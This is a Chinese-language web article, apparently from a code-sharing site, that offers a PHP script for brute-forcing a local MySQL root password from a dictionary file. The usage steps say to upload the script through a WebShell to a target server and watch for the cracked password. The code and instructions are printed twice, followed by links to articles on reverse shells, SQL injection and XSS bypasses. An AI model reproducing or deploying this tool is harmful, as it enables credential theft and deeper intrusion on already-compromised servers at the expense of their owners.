PHP Mysql 密碼暴力破解代碼,本機(jī)暴力破解 3306 端口
發(fā)布時(shí)間:2012-01-25 22:28:21 作者:佚名
我要評(píng)論

PHP Mysql 密碼暴力破解,本機(jī)暴力破解 3306 端口,源碼。代碼簡(jiǎn)單的不能再簡(jiǎn)單了,就不解釋了,功能很簡(jiǎn)單
傳到WebShell上去暴力破解本機(jī)的MySql數(shù)據(jù)庫(kù)Root或其它用戶(hù)的密碼,因?yàn)槭瞧平獗緳C(jī),所以速度奇快無(wú)比,貌似還有點(diǎn)效果,這個(gè)以前有人發(fā)過(guò),這個(gè)是我改過(guò)的。已知有一處Bug,不清楚為何,密碼數(shù)量少的時(shí)候,準(zhǔn)確率100%,但是當(dāng)密碼數(shù)量達(dá)到5000以上時(shí),準(zhǔn)確率0%,明明正確……
<?
set_time_limit(0); //腳本不超時(shí)
$user="root"; //用戶(hù)名
$passwd=file("password.txt"); //密碼字典
for($i=0;$i<count($passwd);$i++){
$pass=$passwd[$i];
connect($user,$pass);
flush();
}
echo "掃描結(jié)束!";
function connect($user,$pass) {
$conn=@mysql_connect("localhost",$user,$pass);
if($conn){
echo "<font color='#0000FF'><b>得到密碼:<font color='#FF0000'>".$pass."</font>?。?!</b></font>";
exit();
}
else {
echo $pass.'
';
}
}
?>
代碼簡(jiǎn)單的不能再簡(jiǎn)單了,就不解釋了,功能很簡(jiǎn)單,傳到WebShell上去暴力破解本機(jī)的MySql數(shù)據(jù)庫(kù)Root或其它用戶(hù)的密碼,因?yàn)槭瞧平獗緳C(jī),所以速度奇快無(wú)比,貌似還有點(diǎn)效果,這個(gè)以前有人發(fā)過(guò),這個(gè)是我改過(guò)的。
已知有一處Bug,不清楚為何,密碼數(shù)量少的時(shí)候,準(zhǔn)確率100%,但是當(dāng)密碼數(shù)量達(dá)到5000以上時(shí),準(zhǔn)確率0%,明明正確的密碼,卻不顯示正確,除非你把這個(gè)密碼放在字典最末尾,才顯示正確,不清楚是什么原因造成的,開(kāi)始以為是暴破間隔時(shí)間太短,加了延時(shí)函數(shù),還是這樣。。。
或許只是我個(gè)別原因?各位試試就知道了。
用法:
1、修改 PHP 代碼中的用戶(hù)名
2、準(zhǔn)備字典 password.txt,每行一個(gè),理論上支持無(wú)數(shù)行。
3、將腳本和字典一起傳到目標(biāo)Web服務(wù)器上,訪(fǎng)問(wèn)該腳本,即開(kāi)始暴力破解,破解結(jié)果實(shí)時(shí)輸出,盯著就行了。
復(fù)制代碼
代碼如下:<?
set_time_limit(0); //腳本不超時(shí)
$user="root"; //用戶(hù)名
$passwd=file("password.txt"); //密碼字典
for($i=0;$i<count($passwd);$i++){
$pass=$passwd[$i];
connect($user,$pass);
flush();
}
echo "掃描結(jié)束!";
function connect($user,$pass) {
$conn=@mysql_connect("localhost",$user,$pass);
if($conn){
echo "<font color='#0000FF'><b>得到密碼:<font color='#FF0000'>".$pass."</font>?。?!</b></font>";
exit();
}
else {
echo $pass.'
';
}
}
?>
代碼簡(jiǎn)單的不能再簡(jiǎn)單了,就不解釋了,功能很簡(jiǎn)單,傳到WebShell上去暴力破解本機(jī)的MySql數(shù)據(jù)庫(kù)Root或其它用戶(hù)的密碼,因?yàn)槭瞧平獗緳C(jī),所以速度奇快無(wú)比,貌似還有點(diǎn)效果,這個(gè)以前有人發(fā)過(guò),這個(gè)是我改過(guò)的。
已知有一處Bug,不清楚為何,密碼數(shù)量少的時(shí)候,準(zhǔn)確率100%,但是當(dāng)密碼數(shù)量達(dá)到5000以上時(shí),準(zhǔn)確率0%,明明正確的密碼,卻不顯示正確,除非你把這個(gè)密碼放在字典最末尾,才顯示正確,不清楚是什么原因造成的,開(kāi)始以為是暴破間隔時(shí)間太短,加了延時(shí)函數(shù),還是這樣。。。
或許只是我個(gè)別原因?各位試試就知道了。
用法:
1、修改 PHP 代碼中的用戶(hù)名
2、準(zhǔn)備字典 password.txt,每行一個(gè),理論上支持無(wú)數(shù)行。
3、將腳本和字典一起傳到目標(biāo)Web服務(wù)器上,訪(fǎng)問(wèn)該腳本,即開(kāi)始暴力破解,破解結(jié)果實(shí)時(shí)輸出,盯著就行了。
相關(guān)文章
thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來(lái)介紹一下thinkphp官方修復(fù)的一個(gè)getshell漏洞,框架對(duì)控制器沒(méi)有進(jìn)行足夠的檢測(cè)導(dǎo)致的一處getshell,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶(hù)端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
SQL注入黑客防線(xiàn)網(wǎng)站實(shí)例分析
這篇文章主要介紹了SQL注入黑客防線(xiàn)網(wǎng)站實(shí)例分析,需要的朋友可以參考下2017-05-19ASP+PHP 標(biāo)準(zhǔn)sql注入語(yǔ)句(完整版)
這里為大家分享一下sql注入的一些語(yǔ)句,很多情況下由于程序員的安全意識(shí)薄弱或基本功不足就容易導(dǎo)致sql注入安全問(wèn)題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學(xué)2017-05-19- 對(duì)于目前流行的sql注入,程序員在編寫(xiě)程序時(shí),都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會(huì)自動(dòng)的記錄下你的IP地址,提交的非法參數(shù)和動(dòng)作等,2017-04-29
XSS繞過(guò)技術(shù) XSS插入繞過(guò)一些方式總結(jié)
我們友情進(jìn)行XSS檢查,偶然跳出個(gè)小彈窗,其中我們總結(jié)了一些平時(shí)可能用到的XSS插入方式,方便我們以后進(jìn)行快速檢查,也提供了一定的思路,其中XSS有反射、存儲(chǔ)、DOM這三類(lèi)2016-12-27Python 爬蟲(chóng)使用動(dòng)態(tài)切換ip防止封殺
這篇文章主要介紹了Python 爬蟲(chóng)使用動(dòng)態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下2016-10-08使用爬蟲(chóng)采集網(wǎng)站時(shí),解決被封IP的幾種方法
這篇文章主要介紹了使用爬蟲(chóng)采集網(wǎng)站時(shí),解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下2016-10-08